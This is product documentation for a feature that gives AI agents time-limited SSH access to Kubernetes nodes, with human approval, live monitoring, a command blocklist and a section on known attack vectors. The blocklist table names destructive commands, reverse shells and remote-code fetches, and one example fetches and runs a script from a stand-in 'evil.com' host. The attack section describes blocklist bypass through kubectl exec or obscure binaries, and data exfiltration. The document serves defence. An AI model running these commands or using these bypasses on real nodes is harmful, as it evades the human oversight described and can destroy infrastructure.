Node SSH Access

How AI agents get time-limited SSH access to your nodes, the security model, known risks, and what you should prepare before enabling it

PodWarden lets AI agents request SSH access to your Kubernetes nodes for troubleshooting. This page explains exactly how it works, what can go wrong, and what you need to do to stay safe.

Read this entire page before enabling Node SSH Access on any MCP token.

Why this exists

AI agents connected via MCP are effective at managing workloads, but some problems require looking at the node itself — checking journalctl logs, inspecting kubectl output from a specific node, diagnosing network issues with ip or ss, checking disk usage. Without SSH access, the agent has to describe the commands and you have to run them manually.

Node SSH Access lets the agent run these commands directly, but only after you explicitly approve each session in a live-monitored dashboard.

Consider run_in_pod first. For tasks inside application containers — fixing PVC permissions, running app CLI tools, checking config files, debugging connectivity — use run_in_pod instead. It requires no approval ceremony, no SSH grants, and is isolated to the container. Only use Node SSH Access for node-level operations like journalctl, systemctl, or ip addr. See Agent Best Practices for a comparison.

The full lifecycle

Here is exactly what happens, from the agent's first request to the end of the session.

Step-by-step breakdown

1. Agent requests access. The AI calls request_node_access(host_id, reason, duration). PodWarden creates a pending grant and returns an approval URL.
2. Agent gives you the URL. The AI cannot approve its own request. It presents the URL and waits.
3. You open the URL. The approval page shows:
   - Which host and cluster the agent wants to access
   - The agent's stated reason
   - Which MCP token is requesting access
   - The session duration (default 5 minutes, max 60 minutes)
   - A summary of what commands are allowed and blocked
   - A link to this documentation page
4. You log in fresh. PodWarden requires recent authentication (within 2 minutes) to approve. If you're using OIDC/Keycloak, you'll be prompted to log in again. If you're using local auth, you'll need a fresh sign-in. This prevents approval by stale browser sessions.
5. You approve. The grant becomes active. The page transitions to a live monitoring dashboard.
6. Agent runs commands. Each command is validated against the blocklist before execution. You see every command, its output, and whether it was allowed or blocked, in real time via server-sent events.
7. Session ends. After the configured duration (or when you click Revoke), the grant expires. No more commands can be executed. The dashboard shows a summary of everything that happened.
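
The lifecycle above can be read as a small state machine. The following is a minimal sketch of that idea, not PodWarden's implementation: the `Grant` class, its field names, and the `GrantState` values are hypothetical, and the lower bound on duration is an assumption. Only the timing constants (10-minute pending expiry, 5-minute default, 60-minute maximum) come from this page.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Optional

PENDING_TTL_S = 10 * 60      # pending grants expire after 10 minutes
DEFAULT_DURATION_S = 5 * 60  # default session length
MAX_DURATION_S = 60 * 60     # maximum session length


class GrantState(Enum):
    PENDING = "pending"
    ACTIVE = "active"
    EXPIRED = "expired"
    REVOKED = "revoked"


@dataclass
class Grant:
    """Hypothetical model of one access grant; all names are illustrative."""
    host_id: str
    reason: str
    created_at: float
    duration_s: int = DEFAULT_DURATION_S
    approved_at: Optional[float] = None
    revoked: bool = False

    def __post_init__(self) -> None:
        # Assumption: any positive duration up to the documented maximum is valid.
        if not 0 < self.duration_s <= MAX_DURATION_S:
            raise ValueError("duration must be positive and at most 60 minutes")

    def state(self, now: float) -> GrantState:
        if self.revoked:
            return GrantState.REVOKED
        if self.approved_at is None:
            expired = now - self.created_at >= PENDING_TTL_S
            return GrantState.EXPIRED if expired else GrantState.PENDING
        if now - self.approved_at >= self.duration_s:
            return GrantState.EXPIRED
        return GrantState.ACTIVE

    def approve(self, now: float) -> None:
        # Only a human-approved, still-pending grant becomes active.
        if self.state(now) is not GrantState.PENDING:
            raise RuntimeError("only a pending grant can be approved")
        self.approved_at = now

    def revoke(self) -> None:
        self.revoked = True

    def can_run_commands(self, now: float) -> bool:
        return self.state(now) is GrantState.ACTIVE
```

In this sketch every command would be gated on `can_run_commands(now)`, so both expiry and revocation take effect on the next command without any background timer.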

What the agent can and cannot do

Allowed

The agent can run single commands or commands piped to safe filters:

kubectl get pods -A, kubectl describe node k3s-1, kubectl logs deployment/myapp
journalctl -u k3s --since "1 hour ago" --no-pager
systemctl status k3s, systemctl status containerd
crictl ps, crictl images, crictl logs
df -h, free -m, top -bn1, ps aux, uptime, lsblk
ip addr, ip route, ss -tlnp, ping -c3 10.0.0.1
cat /etc/k3s/config.yaml, ls /var/lib/rancher/k3s/
Any command piped to: grep, head, tail, wc, sort, awk, sed, jq, cut, uniq, tr, column, cat, xargs

Blocked

These patterns are blocked before the command reaches SSH:

| Category | Examples | Why |
| --- | --- | --- |
| Destructive file ops | `rm -r`, `mkfs`, `dd if=`, `wipefs` | Could destroy data or filesystems |
| System control | `reboot`, `shutdown`, `poweroff`, `init 0` | Could take the node offline |
| User management | `passwd`, `useradd`, `userdel` | Could create backdoor accounts |
| Permission changes | `chmod 777`, `chown -R` | Could weaken file security |
| K8s destructive | `kubeadm reset`, `k3s-uninstall`, `k3s-agent-uninstall` | Could destroy the cluster |
| Network destructive | `iptables -F`, `ip link delete` | Could break networking |
| Service stopping | `systemctl stop/disable/mask sshd/k3s/networking` | Could lock you out |
| Remote code exec | `curl\|sh`, `wget\|sh`, `python -c`, `perl -e`, `eval` | Could execute arbitrary code |
| Reverse shells | `nc -l`, `nc -e` | Could open backdoor connections |
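
To make "pattern-based" concrete, here is a rough sketch of how a regex blocklist of this kind might be checked. The patterns, the `BLOCKLIST` name, and the `find_block_reason` function are illustrative assumptions covering a few of the categories above; they are not PodWarden's actual rules.

```python
import re

# Illustrative patterns only; the real blocklist is not reproduced here.
BLOCKLIST = [
    ("destructive file ops",
     re.compile(r"\brm\s+-\w*r|\bmkfs\b|\bdd\s+if=|\bwipefs\b")),
    ("system control",
     re.compile(r"\b(reboot|shutdown|poweroff)\b|\binit\s+0\b")),
    ("user management",
     re.compile(r"\b(passwd|useradd|userdel)\b")),
    ("remote code exec",
     re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"
                r"|\bpython3?\s+-c\b|\bperl\s+-e\b|\beval\b")),
    ("reverse shells",
     re.compile(r"\bnc\s+-\w*[le]")),
]


def find_block_reason(command: str):
    """Return the first matching category name, or None if nothing matches."""
    for category, pattern in BLOCKLIST:
        if pattern.search(command):
            return category
    return None
```

A list like this is both over- and under-inclusive. In this sketch, `cat /etc/passwd` is flagged because the path contains the word `passwd`, while an unlisted destructive binary would pass, which is why the blocklist is treated as one layer of defense rather than the only one.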

Blocked shell operators

These shell features are blocked entirely:

Command chaining (;, &&, ||): prevents running multiple commands in sequence
Command substitution ($(...), `...`): prevents embedding commands inside commands
Redirection (>, >>, <): prevents writing to files on the node or feeding files to commands as input

Pipes (|) are allowed but only to a restricted set of read-only commands (grep, head, tail, jq, etc.).

Single-quoted strings are safe. Operators inside single quotes are treated as literal text, not shell syntax. This means commands like kubectl get cm -o jsonpath='{.data.config}' or kubectl patch deploy --type merge -p '{"spec":{"replicas":2}}' work correctly — the {, $, and other characters inside the single quotes are not flagged as blocked operators.
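
The operator rules and the single-quote exemption can be sketched as a small character scanner. This is an illustration under stated assumptions, not the actual validator: the function names are hypothetical, double-quoted text is scanned like unquoted text (a conservative choice this page does not specify), and only the operators listed above are checked. The pipe allowlist is copied from the Allowed section.

```python
ALLOWED_PIPE_TARGETS = {
    "grep", "head", "tail", "wc", "sort", "awk", "sed",
    "jq", "cut", "uniq", "tr", "column", "cat", "xargs",
}
BLOCKED_TWO_CHAR = ("&&", "||", ">>", "$(")
BLOCKED_ONE_CHAR = (";", ">", "<", "`")


def split_pipeline(command: str) -> list:
    """Split on unquoted '|'; raise ValueError on a blocked operator."""
    stages, current = [], []
    in_single = False
    for i, ch in enumerate(command):
        if ch == "'":
            in_single = not in_single
            current.append(ch)
        elif in_single:
            current.append(ch)  # literal text inside single quotes
        elif command.startswith(BLOCKED_TWO_CHAR, i):
            raise ValueError(f"blocked operator: {command[i:i + 2]}")
        elif ch in BLOCKED_ONE_CHAR:
            raise ValueError(f"blocked operator: {ch}")
        elif ch == "|":
            stages.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    if in_single:
        raise ValueError("unterminated single quote")
    stages.append("".join(current).strip())
    return stages


def operators_ok(command: str) -> bool:
    """True if no blocked operator appears and every pipe target is allowed."""
    try:
        stages = split_pipeline(command)
    except ValueError:
        return False
    if not all(stages):  # empty stage, e.g. a trailing pipe
        return False
    return all(s.split()[0] in ALLOWED_PIPE_TARGETS for s in stages[1:])
```

For example, `operators_ok("kubectl get cm -o jsonpath='{.data.config}'")` passes because the braces sit inside single quotes, while `operators_ok("uptime; reboot")` fails on the unquoted `;`.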

Security model

What we trust

Your PodWarden instance. The API server runs the command validation and SSH execution. If someone compromises your PodWarden instance, they already have your SSH keys and don't need this feature.
The SSH key. PodWarden uses the same SSH key it already uses for provisioning. Node SSH Access does not introduce new credentials — it uses existing ones in a more controlled way.
The blocklist. Command validation happens server-side before SSH execution. The AI agent never sees or controls the SSH connection directly.

What we do NOT trust

The AI agent. The agent submits commands as text strings. PodWarden treats every command as potentially hostile and validates it against the blocklist. The agent cannot bypass validation because it never gets direct SSH access — it only gets an API endpoint that happens to run SSH commands after validation.
The MCP token. Having an MCP token with node_ssh_access=enabled only lets the agent create pending grants. A human must still approve each session.
The approval URL. It's a one-time-use link to a pending grant. Opening it doesn't approve anything — you still need to authenticate and click approve.

The approval ceremony

The fresh-login requirement exists because SSH approval should be a deliberate act, not something that happens because you left a browser tab open. Combined with the 10-minute expiry on pending grants, the 2-minute window on JWT freshness means:

You must actively log in to approve
A compromised browser session from yesterday cannot approve grants
If you walk away from your computer, pending grants expire after 10 minutes without being approved
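
As a rough illustration of the freshness rule, the check below compares a token's issue time against the 2-minute window. It assumes the token's signature has already been verified elsewhere and that the login time is carried in the standard `iat` (issued-at) claim; which claim PodWarden actually inspects is not stated on this page, and the function name is hypothetical.

```python
import time
from typing import Optional

FRESH_LOGIN_WINDOW_S = 120  # approval requires a login within the last 2 minutes


def is_fresh_login(claims: dict, now: Optional[float] = None) -> bool:
    """Return True if the (already verified) token was issued within the window.

    Assumption: `claims["iat"]` holds the login time as a Unix timestamp.
    """
    now = time.time() if now is None else now
    issued_at = claims.get("iat")
    if not isinstance(issued_at, (int, float)):
        return False  # a missing or malformed claim is never fresh
    age = now - issued_at
    # Reject tokens that are too old and tokens dated in the future.
    return 0 <= age <= FRESH_LOGIN_WINDOW_S
```

A token issued yesterday fails this check no matter how long its overall validity is, which is the property the approval ceremony relies on.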

Known attack vectors

We are transparent about what could go wrong. These are the scenarios we've identified and how we mitigate them, but you should evaluate these risks for your own environment.

1. Blocklist bypass

Risk: The blocklist is pattern-based (regex). A sufficiently creative command could bypass it.

Examples of what the blocklist catches: rm -rf /, reboot, curl http://evil.com/script.sh | bash

Examples that could theoretically bypass it: A command that uses an obscure binary already on the node, or a kubectl exec into a pod that then runs destructive commands inside the container.

Mitigation: The blocklist is defense-in-depth, not the sole security boundary. The real security boundaries are:

The human must approve each session
You watch every command in real time
Sessions expire quickly (default 5 minutes)
You can revoke instantly

What you should do: Understand that the blocklist reduces risk but does not eliminate it. If the agent runs a command you don't recognize, revoke the session immediately.

2. Indirect command execution

Risk: Allowed commands like kubectl exec could be used to run arbitrary commands inside a pod, which then affects the node (e.g., a privileged pod).

Mitigation: This is a Kubernetes security concern, not specific to this feature. If your pods run as privileged or have host mounts, they're already a risk vector regardless of how the kubectl command arrives.

What you should do: Follow Kubernetes security best practices — don't run pods as privileged, use Pod Security Standards, minimize host mounts. These are good practices regardless of whether you use Node SSH Access.

3. Information exfiltration

Risk: The agent can read files and command output. It could read sensitive data (secrets in environment variables, config files with credentials, etc.) and include them in its response to you — which may be logged by the AI provider.

Mitigation: This is inherent to giving any SSH access. The blocklist prevents writing/modifying, but reading is allowed by design (that's the whole point of troubleshooting).

What you should do:

Be aware that command output flows through the AI provider's API
Don't approve SSH access to nodes with sensitive data you wouldn't share with the AI provider
Use Kubernetes secrets (not environment variables) for sensitive values
Consider what's on the node before approving

4. MCP token theft

Risk: If an attacker steals an MCP token with node_ssh_access=enabled, they can create pending grants and then use social engineering to get you to open the approval URL and approve.

Mitigation:

Pending grants expire in 10 minutes
Fresh authentication is required to approve
The approval page shows which MCP token is requesting access — if you don't recognize it, deny
Revoke compromised tokens immediately (Settings -> MCP -> trash icon)

What you should do: Treat MCP tokens like API keys. Don't share them. Rotate them periodically. Use the minimum number of tokens with SSH access enabled.

5. Session duration abuse

Risk: The agent requests a long session (up to 60 minutes) and runs many commands that you can't review fast enough.

Mitigation: Approval is your decision. If the requested duration seems too long, deny the request and ask the agent to request a shorter one. You can also revoke at any time.

What you should do: Start with short durations (5 minutes). Only approve longer sessions when you understand what the agent needs to do. Keep the monitoring dashboard visible.

6. SSH key scope

Risk: The SSH key used for this feature is the same key PodWarden uses for provisioning. If a command exploit leads to key extraction, the attacker has the provisioning key.

Mitigation: The key is written to a temporary file for each command execution and deleted immediately after. The agent never sees the key — only command output.

What you should do: Use separate SSH keys per host where possible (Settings -> Secrets -> SSH key pairs, then assign per host). This limits blast radius if any single key is compromised.
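
The write-then-delete handling of the key described in the mitigation above can be sketched with a context manager. This is an assumption-laden illustration, not PodWarden's code: the `temporary_key_file` helper and the file prefix are hypothetical. It relies on `tempfile.mkstemp`, which creates the file readable and writable only by the current user.

```python
import os
import tempfile
from contextlib import contextmanager


@contextmanager
def temporary_key_file(private_key: str):
    """Write the key to a private temp file and delete it on exit."""
    fd, path = tempfile.mkstemp(prefix="node-key-")  # owner-only permissions
    try:
        with os.fdopen(fd, "w") as handle:
            handle.write(private_key)
        # The caller would pass `path` to the SSH client here,
        # for example as the argument to `ssh -i`.
        yield path
    finally:
        os.unlink(path)  # runs even if the command raised an error
```

Because the deletion sits in a `finally` block, the key file is removed whether the command succeeds, fails, or times out.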

Before you enable this

Checklist

You understand the risks. Read the attack vectors above. This feature gives AI agents controlled access to run commands on your infrastructure.
You have monitoring in place. The live dashboard is your primary control. Don't approve and walk away.
You can recover. Know how to restore your nodes if something goes wrong. Have backups. Know how to re-provision a node with PodWarden if it gets into a bad state.
You've limited the blast radius.
- Enable node_ssh_access on as few MCP tokens as possible
- Use dedicated SSH keys per host
- Keep session durations short
You trust the AI provider. Command output passes through the AI provider's API. If your nodes contain data you can't share with the provider, don't approve SSH access to those nodes.
You know how to revoke. Both from the monitoring dashboard (big red button) and from the MCP token settings page (revoke the entire token).

Enabling Node SSH Access

Per-token toggle

Node SSH Access is disabled by default on all MCP tokens. To enable it:

Go to Settings -> MCP
Find the token in the table
Toggle the SSH column switch to on (green)

This only allows the token to request access. A human must still approve each session.

Disabling

Toggle the switch back to off, or revoke the token entirely. Any active grants from that token will continue until they expire — they are not retroactively revoked when you disable the token setting. To immediately stop an active session, use the Revoke button on the monitoring dashboard.

Monitoring a session

When you approve an SSH access grant, the page becomes a live monitoring dashboard:

Countdown timer shows remaining time with a progress bar. Turns red when under 60 seconds.
Revoke button immediately terminates the session. Always visible.
Command log shows every command the agent submits:
- Green border: command succeeded (exit code 0)
- Amber border: command ran but returned non-zero exit code
- Red background: command was blocked by the validation rules
- Each entry shows the command, execution time, stdout, and stderr

The log auto-scrolls to the latest entry. After the session ends, the log remains visible as an audit record for that browser tab.
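
The colour rules for the command log and the timer reduce to two small decisions. The sketch below shows one way to express them; the `LogEntry` fields, the style names, and both function names are hypothetical and chosen only for illustration.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class LogEntry:
    command: str
    blocked: bool
    exit_code: Optional[int] = None  # None when the command never ran


def entry_style(entry: LogEntry) -> str:
    """Map a log entry to the visual style described above."""
    if entry.blocked:
        return "red-background"   # rejected by the validation rules
    if entry.exit_code == 0:
        return "green-border"     # ran and succeeded
    return "amber-border"         # ran but returned a non-zero exit code


def timer_is_red(remaining_s: float) -> bool:
    """The countdown turns red when under 60 seconds remain."""
    return remaining_s < 60
```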

FAQ

Can the agent approve its own request?

No. Approval requires a JWT from a human admin who logged in within the last 2 minutes. MCP tokens cannot approve grants.

What happens if my browser closes during an active session?

The session continues until it expires. The agent can still run commands. You can reopen the approval URL to reconnect to the monitoring stream. To stop the session early, reopen the URL and click Revoke.
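
The monitoring stream uses server-sent events, which are plain text: `data:` lines accumulate until a blank line ends the event. For readers who want to see what a client does with such a stream, here is a minimal parser sketch. The JSON payload shape (`command`, `status`) is an assumption made for the example, not PodWarden's documented format, and other SSE fields such as `event:` and `id:` are ignored.

```python
import json


def parse_sse(stream_text: str) -> list:
    """Parse SSE text into a list of JSON-decoded event payloads."""
    events, data_lines = [], []
    for line in stream_text.splitlines():
        if line == "":
            # A blank line dispatches the event collected so far.
            if data_lines:
                events.append(json.loads("\n".join(data_lines)))
                data_lines = []
        elif line.startswith(":"):
            continue  # comment line, often used as a keep-alive
        elif line.startswith("data:"):
            value = line[len("data:"):]
            # A single leading space after the colon is not part of the value.
            data_lines.append(value[1:] if value.startswith(" ") else value)
    return events
```

An event that is not followed by a blank line is treated as incomplete and dropped, which matches how the SSE format defines event boundaries.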

Are commands logged permanently?

No. Grants and their command logs are stored in memory only. They're cleaned up 1 hour after the session ends. If PodWarden restarts, all grants are lost. For permanent audit trails, use the MCP Activity Log which records all API calls including command executions.
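
The retention behaviour described here (memory only, removed one hour after the session ends) can be pictured with a small store like the one below. The class and method names are hypothetical, and how PodWarden actually schedules cleanup is not specified on this page.

```python
RETENTION_S = 60 * 60  # logs are cleaned up 1 hour after the session ends


class EndedGrantStore:
    """Hypothetical in-memory store; its contents vanish if the process exits."""

    def __init__(self) -> None:
        self._ended = {}  # grant_id -> (ended_at, command_log)

    def record_ended(self, grant_id: str, ended_at: float, command_log: list) -> None:
        self._ended[grant_id] = (ended_at, list(command_log))

    def get_log(self, grant_id: str):
        entry = self._ended.get(grant_id)
        return None if entry is None else entry[1]

    def cleanup(self, now: float) -> int:
        """Drop grants that ended at least RETENTION_S ago; return the count."""
        stale = [
            grant_id
            for grant_id, (ended_at, _) in self._ended.items()
            if now - ended_at >= RETENTION_S
        ]
        for grant_id in stale:
            del self._ended[grant_id]
        return len(stale)
```

Nothing in a store like this survives a restart, which is why a separate persistent log is needed for long-term auditing.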

Can I restrict which hosts the agent can access?

Currently, any host in PodWarden can be requested. The control is at the approval step — you decide whether to approve each request based on the target host. Per-host restrictions may be added in a future release.

What if the agent requests access and I'm not available?

Pending grants expire after 10 minutes. The agent receives an expiry notice and must submit a new request once you're available.

Does this work without OIDC/Keycloak?

Yes. If you use local authentication (username/password), the approval page redirects to the local sign-in page. The fresh-login requirement still applies — your JWT must have been issued within the last 2 minutes.

Can multiple agents have active sessions on the same node?

Yes. Each grant is independent. This is by design for cases where you might have different agents troubleshooting different issues. Each session has its own monitoring dashboard.